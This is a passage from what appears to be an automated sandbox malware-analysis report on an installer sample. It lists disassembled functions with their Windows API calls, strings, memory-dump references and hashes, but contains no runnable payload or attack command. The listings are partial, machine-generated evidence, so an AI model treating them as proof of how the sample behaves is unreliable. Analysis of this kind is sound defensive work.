                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                • GlobalFree.KERNEL32(?), ref: 00402725
                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                • GlobalFree.KERNEL32(00000000), ref: 0040273E
                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                • String ID:
                                • API String ID: 3294113728-0
                                • Opcode ID: 6c70dd5e24678078cb6415e9c6392547dd21b53fc970282deceed51b45fe2952
                                • Instruction ID: 12be5ee7c0a04460072f4a22dab7179149aa53ae67e7a866020ad89d1ba75591
                                • Opcode Fuzzy Hash: 6c70dd5e24678078cb6415e9c6392547dd21b53fc970282deceed51b45fe2952
                                • Instruction Fuzzy Hash: 5831C071C00128BBDF216FA5CD88EAE7E79EF04368F10423AF524762E0C7795D419BA8
                                Function 00404D7B Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                • lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                • lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                • SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                • String ID:
                                • API String ID: 2531174081-0
                                • Opcode ID: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                • Instruction ID: 7f48be0438031ac4014e4461c76190d89e96d247d5b12388d0b77bfdc4e74ae1
                                • Opcode Fuzzy Hash: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                • Instruction Fuzzy Hash: 09216DB1E00158BBDB119FA5CD84ADEBFB9FF45354F14807AFA04B6290C7398A419B98
                                Function 0040464A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404665
                                • GetMessagePos.USER32 ref: 0040466D
                                • ScreenToClient.USER32(?,?), ref: 00404687
                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404699
                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046BF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                • Instruction ID: 811e074b116e6ce6d11e192741490be2760717d42b69e64a674173994bb84636
                                • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                • Instruction Fuzzy Hash: 4E014C71D00219BADB00DBA4DC85FFEBBB8AB59711F10052ABA00B61D0D7B8A9058BA5
                                Function 00402B3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                Download Yara Rule
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                • MulDiv.KERNEL32(0005E600,00000064,?), ref: 00402B81
                                • wsprintfA.USER32 ref: 00402B91
                                • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                Strings
                                • verifying installer: %d%%, xrefs: 00402B8B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                • Instruction ID: e41715c37a5330c5740685503c003044c4943c79b663b03d39d41db920bc543d
                                • Opcode Fuzzy Hash: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                • Instruction Fuzzy Hash: 34014470A00209ABDB249F60DD09EAE3779AB04345F008039FA16B92D1D7B49A559F99
                                Function 00402A36 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Close$DeleteEnumOpen
                                • String ID:
                                • API String ID: 1912718029-0
                                • Opcode ID: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                • Instruction ID: 582bceb6e4b24316922a1ee6e85d565da044e62c79b522cd3b8563d0d5e38007
                                • Opcode Fuzzy Hash: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                • Instruction Fuzzy Hash: E7111771A10049BEEF31AF90DE49DAF7B7DEB44345B104036F906A10A0DBB49E51AF69
                                Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?), ref: 00401CC5
                                • GetClientRect.USER32(00000000,?), ref: 00401CD2
                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CF3
                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                • DeleteObject.GDI32(00000000), ref: 00401D10
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                • API String ID: 1849352358-0
                                • Opcode ID: 040e4684e74ef7b69d4f9af20bee9e4e1a156ef82e91de0239870d1665a1d994
                                • Instruction ID: c9eade559dcb8dabe12f7fb8fefc2ecb3bb817c4e851fb83d30c8e131ed4808d
                                • Opcode Fuzzy Hash: 040e4684e74ef7b69d4f9af20bee9e4e1a156ef82e91de0239870d1665a1d994
                                • Instruction Fuzzy Hash: B5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                Function 00404568 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(00420478,00420478,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404488,000000DF,0000040F,00000400,00000000), ref: 004045F6
                                • wsprintfA.USER32 ref: 004045FE
                                • SetDlgItemTextA.USER32(?,00420478), ref: 00404611
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                • Instruction ID: de100ae33fd703a766e80fabf1c0ef7e237f6bef08e04a4196497c65211e5d03
                                • Opcode Fuzzy Hash: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                • Instruction Fuzzy Hash: 331104B370012477DB10666D9C05EAF329DDBC6334F14023BFA2AF61D1E9388C1186E8
                                Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                • Instruction ID: 089b6e11c3ee5c2ceb15467343933f82bc3488a694e04e66c57418204d538f9a
                                • Opcode Fuzzy Hash: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                • Instruction Fuzzy Hash: B321C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718
                                Function 0040523D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422480,Error launching installer), ref: 00405262
                                • CloseHandle.KERNEL32(?), ref: 0040526F
                                Strings
                                • Error launching installer, xrefs: 00405250
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040523D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CloseCreateHandleProcess
                                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                • API String ID: 3712363035-1560902751
                                • Opcode ID: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                • Instruction ID: 0a3d69d2a3401d9d63374a1600280413a6fd3692a6ba6d2da32d4f839eaa01ec
                                • Opcode Fuzzy Hash: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                • Instruction Fuzzy Hash: BEE0E674A1010ABBDB00EF64DD09D6B7B7CFB00304B408621E911E2150D774E4108A79
                                Function 004054D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054D6
                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054DF
                                • lstrcatA.KERNEL32(?,00409010), ref: 004054F0
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004054D0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CharPrevlstrcatlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 2659869361-297319885
                                • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                • Instruction ID: 18d73bba3a4f2c077241afd2b81ba446c35da1b9bd2d8ef2eba9fb39a34af30a
                                • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                • Instruction Fuzzy Hash: 09D0A7B2505970AED20126195C05FCF2A08CF023117044423F640B21D2C63C5C819BFD
                                Function 00401F51 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                  • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                  • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                • String ID:
                                • API String ID: 2987980305-0
                                • Opcode ID: 9b564887ea250fec720acf1d14385518bd2ff36926a3d3c154242c6b74caae1f
                                • Instruction ID: d4347cebb671b603d0a5d412fc90ce50d757f993dc699470b494ace3858b78d6
                                • Opcode Fuzzy Hash: 9b564887ea250fec720acf1d14385518bd2ff36926a3d3c154242c6b74caae1f
                                • Instruction Fuzzy Hash: 7221EE72D04216ABCF107FA4DE89A6E75B06B44359F204337F611B52E0D77C4941965E
                                Function 00402303 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                • lstrlenA.KERNEL32(0040A350,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                • RegSetValueExA.ADVAPI32(?,?,?,?,0040A350,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                • RegCloseKey.ADVAPI32(?,?,?,0040A350,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CloseCreateValuelstrlen
                                • String ID:
                                • API String ID: 1356686001-0
